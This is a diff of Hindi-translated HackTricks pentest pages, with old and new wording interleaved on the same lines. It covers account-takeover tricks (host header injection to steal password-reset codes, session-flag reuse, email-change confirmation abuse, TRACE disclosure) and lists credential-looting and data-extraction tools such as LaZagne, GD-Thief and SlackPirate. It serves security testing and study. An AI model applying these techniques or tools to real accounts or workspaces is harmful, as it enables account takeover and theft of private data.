कर सकते हैं और उनके पासवर्ड रीसेट कोड चुरा सकते हैं। [WriteUp](https://medium.com/nassec-cybersecurity-writeups/how-i-was-able-to-take-over-any-users-account-with-host-header-injection-546fff6d0f2).
{% hint style="warning" %} {% hint style="warning" %}
ध्यान दें कि यह संभव है कि आपको उपयोगकर्ता को रीसेट पासवर्ड लिंक पर क्लिक करने की प्रतीक्षा नहीं करनी पड़े, क्योंकि शायद **स्पैम फ़िल्टर या अन्य बीचक उपकरण / बॉट इसे विश्लेषण करने के लिए क्लिक करेंगे**। ध्यान दें कि यह संभित है कि आपको उपयोगकर्ता को रीसेट पासवर्ड लिंक पर क्लिक करने का इंतजार नहीं करना पड़े, क्योंकि शायद **स्पैम फ़िल्टर या अन्य बीचक उपकरण/बॉट इसे विश्लेषित करने के लिए क्लिक करेंगे**।
{% endhint %} {% endhint %}
### सत्र बूलियन ### सत्र बूलियन
कभी-कभी जब आप कुछ सत्यापन सही तरीके से पूरा करते हैं, तो बैक-एंड **आपके सत्र में सुरक्षा गुणधर्म के लिए "True" के साथ एक बूलियन जोड़ देगा**। फिर, एक अलग एंडपॉइंट जानेगा कि क्या आपने उस जांच को सफलतापूर्वक पार किया है।\ कभी-कभी जब आप कुछ सत्यापन सही तरीके से पूरा करते हैं तो बैक-एंड **केवल एक बूलियन को "सच" के मान सुरक्षा विशेषता में आपके सत्र में जोड़ देगा**। फिर, एक विभिन्न अंतबार्ता जानेगा कि क्या आपने उस जांच को सफलतापूर्वक पार किया है।\
हालांकि, यदि आप **जांच पास करते हैं** और आपके सत्र को सुरक्षा गुणधर्म में "True" मान दिया जाता है, तो आप उन संसाधनों का प्रयास कर सकते हैं जो **उसी गुणधर्म पर निर्भर करते हैं** लेकिन आपको **पहुँचने की अनुमति नहीं होनी चाहिए**। [WriteUp](https://medium.com/@ozguralp/a-less-known-attack-vector-second-order-idor-attacks-14468009781a). हालांकि, यदि आप **जांच पास** करते हैं और आपके सत्र को सुरक्षा विशेषता में "सच" मान्यता दी जाती है, तो आप कोशिश कर सकते हैं **अन्य संसाधनों तक पहुंचने** की जो **उसी विशेषता पर निर्भर** करते हैं लेकिन आपको **पहुंचने की अनुमति नहीं** है। [WriteUp](https://medium.com/@ozguralp/a-less-known-attack-vector-second-order-idor-attacks-14468009781a).
### पंजीकरण कार्यक्षमता ### पंजीकरण कार्यक्षमता
एक पहले से मौजूदा उपयोगकर्ता के रूप में पंजीकरण करने का प्रयास करें। समानार्थक वर्णों (डॉट, बहुत सारे अंतरिक्ष और यूनिकोड) का उपयोग करने का प्रयास करें कोशिश करें कि एक पहले से मौजूदा उपयोगकर्ता के रूप में पंजीकरण करें। इसके अलावा समानार्थक वर्ण भी उपयोग करने की कोशिश करें (डॉट, बहुत सारे अंतरिक्ष और यूनिकोड)।
### ईमेल का तबादला ### ईमेल का अधिकार
एक ईमेल पंजीकरण करें, पुष्टि करने से पहले ईमेल बदलें, फिर, यदि नया पुष्टिकरण ईमेल पहले पंजीकृत ईमेल पर भेज एक ईमेल पंजीकरण करें, पुष्टि करने से पहले ईमेल बदलें, फिर, यदि नया पुष्टि ईमेल पहले पंजीकृत ईमेल पर भेजा जाता है, तो आप किसी भी ईमेल को अधिकार में ले सकते हैं। या यदि आप पहले वाले को दूसरे ईमेल की पुष्टि करने की अनुमति दे सकते हैं, तो आप किसी भी खाता को अधिकार में ले सकते हैं।
### कंपनियों के आटलासियन का आंतरिक सर्विसडेस्क तक पहुंचें
{% embed url="https://yourcompanyname.atlassian.net/servicedesk/customer/user/login" %}
### TRACE विधि
डेवलपर्स कई बार उत्पादन वातावरण में विभिन्न डीबगिंग विकल्पों को अक्षम करना भूल जाते हैं। उदाहरण के लिए, HTTP `TRACE` विधि निदानात्मक उद्देश्यों के लिए डिज़ाइन की गई है। यदि सक्षम है, तो वेब सर्वर उन अनुरोधों का प्रतिसाद देगा जो `TRACE` विधि का उपयोग करते हैं और प्रतिसाद में उस अनुरोध को गुणाकार में वापस भेजेगा जो प्राप्त किया गया था। यह व्यवहार अक्सर अहानिक होता है, लेकिन कभी-कभी सूचना खुलासा करता है, जैसे कि आंतरिक प्रमाणीकरण हेडरों का नाम जो अनुरोधों में प्रतिस्थापित किया जा सकता है द्वारा प्रतिस्थापित किया जा सकता है।![Image for post](https://miro.medium.com/max/60/1\*wDFRADTOd9Tj63xucenvAA.png?q=20)
![Image for post](https://miro.medium.com/max/1330/1\*wDFRADTOd9Tj63xucenvAA.png)
{% hint style="success" %}
**AWS हैकिंग सीखें और प्रैक्टिस करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
**GCP हैकिंग सीखें और प्रैक्टिस करें:** <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>HackTricks का समर्थन करें</summary>
* [**सदस्यता योजनाएँ**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर **फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
</details>
{% endhint %}

View file

@ -1,36 +1,21 @@
{% hint style="success" %}
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) **और** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github रेपो में।**
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram group**](https://t.me/peass) में या मुझे **Twitter** 🐦 पर **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें।
</details> </details>
{% endhint %}
**DNS पर हमलों के बारे में और अध्ययन करें** **DNS पर हमलों के बारे में अधिक अनुसंधान करें**
**DNSSEC और DNSSEC3** **DNSSEC और DNSSEC3**
**IPv6 में DNS** **IPv6 में DNS**
<details>
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में शामिल हों या [**telegram group**](https://t.me/peass) में या मुझे **Twitter** 🐦 पर **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें।
</details>

View file

@ -1,41 +1,28 @@
<details> {% hint style="success" %}
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें**](https://peass.creator-spring.com)
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपोज़ में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें.
</details>
## **Local l00t**
* [**PEASS-ng**](https://github.com/carlospolop/PEASS-ng): ये स्क्रिप्ट्स, PE वेक्टर्स की खोज के अलावा, फाइलसिस्टम के अंदर संवेदनशील जानकारी की खोज करेंगी।
* [**LaZagne**](https://github.com/AlessandroZ/LaZagne): **LaZagne प्रोजेक्ट** एक ओपन सोर्स एप्लिकेशन है जिसका उपयोग एक स्थानीय कंप्यूटर पर संग्रहीत बहुत सारे पासवर्ड्स को पुनः प्राप्त करने के लिए किया जाता है। प्रत्येक सॉफ्टवेयर अपने पासवर्ड्स को विभिन्न तकनीकों (plaintext, APIs, कस्टम एल्गोरिदम, डेटाबेस, आदि) का उपयोग करके संग्रहीत करता है। यह टूल सबसे अधिक प्रयुक्त सॉफ्टवेयर के लिए इन पासवर्ड्स को खोजने के उद्देश्य से विकसित किया गया है।
## **External Services**
* [**Conf-Thief**](https://github.com/antman1p/Conf-Thief): यह मॉड्यूल Confluence के API से एक्सेस टोकन का उपयोग करके कनेक्ट होगा, PDF में निर्यात करेगा, और उन Confluence दस्तावेजों को डाउनलोड करेगा जिन तक लक्ष्य की पहुँच है।
* [**GD-Thief**](https://github.com/antman1p/GD-Thief): यह एक Red Team टूल है जो आपके (हमलावर) द्वारा पहुँच योग्य लक्ष्य के Google Drive से फाइलों को निकालने के लिए Google Drive API का उपयोग करता है। इसमें सभी साझा की गई फाइलें, साझा ड्राइव्स से सभी फाइलें, और डोमेन ड्राइव्स से सभी फाइलें शामिल हैं जिन तक लक्ष्य की पहुँच है।
* [**GDir-Thief**](https://github.com/antman1p/GDir-Thief): यह एक Red Team टूल है जो लक्ष्य संगठन की Google People Directory को निकालने के लिए Google के People API का उपयोग करता है जिस तक आपकी पहुँच है।
* [**SlackPirate**](https://github.com/emtunc/SlackPirate)**:** यह एक Python में विकसित टूल है जो एक Slack workspace से 'रोचक' जानकारी निकालने के लिए मूल Slack APIs का उपयोग करता है, बशर्ते एक्सेस टोकन दिया गया हो।
* [**Slackhound**](https://github.com/BojackThePillager/Slackhound): Slackhound एक कमांड लाइन टूल है जो लाल और नीली टीमों को एक Slack workspace/संगठन की त्वरित रेकी करने के लिए है। Slackhound एक संगठन के उपयोगकर्ताओं, फाइलों, संदेशों, आदि का संग्रह जल्दी से खोज योग्य बनाता है और बड़ी वस्तुओं को ऑफलाइन समीक्षा के लिए CSV में लिखा जाता है।
<details> <details>
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर हमें **फॉलो** करें।
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
* [**आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें**](https://peass.creator-spring.com)
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपोज़ में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें.
</details> </details>
{% endhint %}
## **स्थानीय लूट**
* [**PEASS-ng**](https://github.com/carlospolop/PEASS-ng): ये स्क्रिप्ट, PE वेक्टर्स की खोज के अलावा, फाइल सिस्टम के अंदर संवेदनशील जानकारी की खोज करेंगे।
* [**LaZagne**](https://github.com/AlessandroZ/LaZagne): **LaZagne प्रोजेक्ट** एक ओपन सोर्स एप्लिकेशन है जिसका उपयोग स्थानीय कंप्यूटर पर स्टोर की गई कई पासवर्ड्स को पुनः प्राप्त करने के लिए किया जाता है। प्रत्येक सॉफ्टवेयर अलग-अलग तकनीकों (सादा पाठ, एपीआई, कस्टम एल्गोरिदम्स, डेटाबेस, आदि) का उपयोग करके अपने पासवर्ड्स को स्टोर करता है। इस टूल का विकास इन पासवर्ड्स को खोजने के उद्देश्य से किया गया है जो सबसे अधिक प्रयोग किए जाने वाले सॉफ्टवेयर के लिए है।
## **बाह्य सेवाएं**
* [**Conf-Thief**](https://github.com/antman1p/Conf-Thief): यह मॉड्यूल Confluence के एपीआई से कनेक्ट करेगा, पीडीएफ में निर्यात करेगा, और उन Confluence दस्तावेज़ों को डाउनलोड करेगा जिनका लक्ष्य है कि लक्ष्य को पहुंच है।
* [**GD-Thief**](https://github.com/antman1p/GD-Thief): रेड टीम टूल एक लक्ष्य के Google Drive से फ़ाइलों को बाहर निकालने के लिए जिसका आपको पहुंच है, Google Drive एपीआई के माध्यम से। इसमें सभी साझा की गई फ़ाइलें, साझा ड्राइव से सभी फ़ाइलें, और डोमेन ड्राइव से सभी फ़ाइलें शामिल हैं जिनका लक्ष्य को पहुंच है।
* [**GDir-Thief**](https://github.com/antman1p/GDir-Thief): रेड टीम टूल जिसका उपयोग Google के लोगों के निर्देशिका को बाहर निकालने के लिए किया जाता है, जिसका आपको पहुंच है, Google के लोगों के एपीआई के माध्यम से।
* [**SlackPirate**](https://github.com/emtunc/SlackPirate)**:** यह एक टूल है जो Python में विकसित किया गया है जो एक एक्सेस टोकन देता है जिसका उपयोग करके एक स्लैक वर्कस्पेस से 'दिलचस्प' जानकारी निकालने के लिए नेटिव स्लैक एपीआई का उपयोग करता है।
* [**Slackhound**](https://github.com/BojackThePillager/Slackhound): Slackhound एक कमांड लाइन टूल है जो रेड और ब्लू टीमों को एक स्लैक वर्कस्पेस/संगठन की जांच तेजी से करने के लिए है। Slackhound एक संगठन के उपयोगकर्ताओं, फ़ाइलों, संदेशों आदि का संग्रहण तेजी से खोजने में मदद करता है और बड़े ऑब्जेक्ट्स को CSV में लिखा जाता है ऑफलाइन समीक्षा के लिए।